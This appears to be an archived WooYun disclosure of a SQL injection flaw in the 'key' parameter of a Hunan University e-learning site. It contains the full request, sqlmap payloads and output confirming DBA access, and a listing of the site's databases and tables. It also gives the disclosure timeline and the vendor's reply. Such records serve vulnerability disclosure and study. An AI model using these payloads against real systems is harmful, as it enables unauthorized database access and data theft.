乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
http://acadol.hnu.edu.cn
POST /Hunan/ajax/question/getList.do HTTP/1.1Content-Length: 201Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://acadol.hnu.edu.cnCookie: JSESSIONID=84C8AC98912A4DCD66DA4BBFBA892712; looyu_id=cbe248b02accdf85c0a4bb0ad3ee6529b2_10035260%3A1; looyu_10035260=v%3Acbe248b02accdf85c0a4bb0ad3ee6529b2%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do; _99_mon=%5B1%2C6%2C0%5D; __t99_10035260="_u:cbe248b02accdf85c0a4bb0ad3ee6529b2,_v:cbe248b02accdf85c0a4bb0ad3ee6529b2,_site:6759,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Facadol.hnu.edu.cn%2FHunan%2Funiversity%2Fnews%2Flist.do,_r:"Host: acadol.hnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*by=desc&catalogId=0&courseId=0&curPage=1&key=&order=hot&pageSize=12
key参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: key (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND 3937=3937 AND 'HGnX' LIKE 'HGnX&order=hot&pageSize=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND (SELECT 9756 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(9756=9756,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RLdI' LIKE 'RLdI&order=hot&pageSize=12---web application technology: Nginx, JSPback-end DBMS: MySQL 5.0current user: 'root@%'current database: 'hndx'current user is DBA: Trueavailable databases [7]:[*] hndx[*] hndx_ceshi[*] hunan[*] information_schema[*] mysql[*] performance_schema[*] test
ack-end DBMS: MySQL 5.0[13:35:15] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[13:35:15] [INFO] fetching tables for database: 'hndx'[13:35:15] [INFO] the SQL query used returns 454 entries[13:35:15] [INFO] retrieved: company_detail[13:35:16] [INFO] retrieved: edp_invitetendersrelationcompany[13:35:16] [INFO] retrieved: edp_invitetendersrelationtutors[13:35:17] [INFO] retrieved: el_discuss_relation_poll[13:35:17] [INFO] retrieved: el_poll_option[13:35:18] [INFO] retrieved: el_question_group[13:35:18] [INFO] retrieved: el_room_relation_elgroup[13:35:18] [INFO] retrieved: el_staff_relation_poll[13:35:19] [INFO] retrieved: kx_admin_message[13:35:19] [INFO] retrieved: kx_api_course_session[13:35:19] [INFO] retrieved: kx_co_account_buy_records[13:35:20] [INFO] retrieved: kx_co_bulletin[13:35:20] [INFO] retrieved: kx_co_company[13:35:20] [INFO] retrieved: kx_co_company_account[13:35:21] [INFO] retrieved: kx_co_company_buy[13:35:21] [INFO] retrieved: kx_co_company_license[13:35:21] [INFO] retrieved: kx_co_company_relation_course[13:35:22] [INFO] retrieved: kx_co_company_website[13:35:22] [INFO] retrieved: kx_co_config[13:35:22] [INFO] retrieved: kx_co_config_copy[13:35:23] [INFO] retrieved: kx_co_course[13:35:23] [INFO] retrieved: kx_co_course_auth_member[13:35:24] [INFO] retrieved: kx_co_course_catalog[13:35:24] [INFO] retrieved: kx_co_course_question[13:35:24] [INFO] retrieved: kx_co_course_question_option[13:35:25] [INFO] retrieved: kx_co_course_sco[13:35:25] [INFO] retrieved: kx_co_course_testrule[13:35:26] [INFO] retrieved: kx_co_courseware[13:35:26] [INFO] retrieved: kx_co_dept[13:35:27] [INFO] retrieved: kx_co_domain_reserve[13:35:27] [INFO] retrieved: kx_co_knowledge_sharing[13:35:28] [INFO] retrieved: kx_co_manager[13:35:28] [INFO] retrieved: kx_co_message[13:35:29] [INFO] retrieved: kx_co_module[13:35:29] [INFO] retrieved: kx_co_mycertificate[13:35:30] [INFO] retrieved: kx_co_point[13:35:30] [INFO] retrieved: kx_co_read_massage[13:35:31] [INFO] retrieved: kx_co_register[13:35:31] [INFO] retrieved: kx_co_staff[13:35:32] [INFO] retrieved: kx_co_staff_accont[13:35:32] [INFO] retrieved: kx_co_staff_apply[13:35:33] [INFO] retrieved: kx_co_staff_auth_course[13:35:33] [INFO] retrieved: kx_co_staff_course_relation[13:35:34] [INFO] retrieved: kx_co_staff_coursecatalog_relation[13:35:34] [INFO] retrieved: kx_co_staff_credit_relation[13:35:34] [INFO] retrieved: kx_co_staff_delivery[13:35:35] [INFO] retrieved: kx_co_staff_learning_course[13:35:35] [INFO] retrieved: kx_co_staff_online[13:35:35] [INFO] retrieved: kx_co_staff_questionoption[13:35:36] [INFO] retrieved: kx_co_staff_records[13:35:36] [INFO] retrieved: kx_co_staff_workexperience[13:35:37] [INFO] retrieved: kx_co_target[13:35:37] [INFO] retrieved: kx_co_targetrelation[13:35:37] [INFO] retrieved: kx_co_targetstaff[13:35:38] [INFO] retrieved: kx_co_task_staff[13:35:38] [INFO] retrieved: kx_co_training_offlinecourse[13:35:39] [INFO] retrieved: kx_co_training_plan[13:35:39] [INFO] retrieved: kx_co_training_plan_catalog_templates[13:35:39] [INFO] retrieved: kx_co_training_plan_staff[13:35:40] [INFO] retrieved: kx_co_training_plan_task[13:35:40] [INFO] retrieved: kx_co_training_plan_task_staff[13:35:41] [INFO] retrieved: kx_co_training_plan_task_staff_relevance[13:35:41] [INFO] retrieved: kx_co_tutor[13:35:41] [INFO] retrieved: kx_co_tutor_answer[13:35:42] [INFO] retrieved: kx_co_tutor_answer_dtl[13:35:42] [INFO] retrieved: kx_co_tutor_course[13:35:43] [INFO] retrieved: kx_co_tutor_course_catalog[13:35:43] [INFO] retrieved: kx_co_tutor_training_catalog[13:35:43] [INFO] retrieved: kx_co_tutor_trainingclass[13:35:44] [INFO] retrieved: kx_co_tutorthesisriew[13:35:44] [INFO] retrieved: kx_discuss_reply[13:35:44] [INFO] retrieved: kx_edp_authorization[13:35:45] [INFO] retrieved: kx_edp_banner[13:35:45] [INFO] retrieved: kx_edp_brochure[13:35:45] [INFO] retrieved: kx_edp_brochure_relation_cour
mysql dba权限...
危害等级:低
漏洞Rank:5
确认时间:2015-12-08 08:21
谢谢,尽快修复
暂无